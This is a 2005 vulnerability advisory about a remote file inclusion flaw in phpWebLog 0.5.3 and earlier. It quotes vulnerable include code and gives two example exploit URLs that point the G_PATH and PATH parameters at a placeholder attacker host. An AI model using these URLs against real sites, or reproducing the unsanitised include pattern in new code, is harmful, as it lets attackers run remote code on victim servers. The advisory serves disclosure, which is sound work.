phpweblog053.txt

`  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: phpWebLog  
Version: <= 0.5.3  
Homepage: http://phpweblog.org/  
  
Author: Filip Groszynski (VXSfx)  
Date: 7 March 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Vulnerable code in include/init.inc.php:  
  
...  
# Allowed HTML tags in stories, comma seperated  
$G_HTML = "<a>,<i>,<b>,<u>,<li>,<p>,<code>,<tt>,<blockquote>";  
  
# Are we developing?  
$G_DEBUG = false;  
  
# Number of seconds to hold cache  
$G_CACHE = 10;  
  
# phpWebLog version  
$G_VER = "0.5.3";  
  
...  
/*== include libraries/functions =========================================*/  
  
include_once("$G_PATH/include/func.inc.php");  
include_once("$G_PATH/include/cache.inc.php");  
include_once("$G_PATH/include/blocks.inc.php");  
include_once("$G_PATH/include/layout.inc.php");  
include_once("$G_PATH/include/parser.inc.php");  
include_once("$G_PATH/include/search.inc.php");  
include_once("$G_PATH/include/comments.inc.php");  
....  
  
--------------------------------------------------------  
  
Vulnerable code in backend/addons/links/index.php:  
  
# Original links code written by Twyst (http://anime-central.net)  
# Modified for use with phpWebLog by Jason Hines  
# Thanks Twyst!  
  
include_once($PATH . "/functions.php");  
....  
  
--------------------------------------------------------  
  
Example:  
  
if register_globals=on and allow_url_fopen=on:  
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/  
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/  
  
--------------------------------------------------------  
  
Vendor status:  
  
Vendor has been notified.  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <at> gmail <dot> com  
HP: http://shell.homeunix.org  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`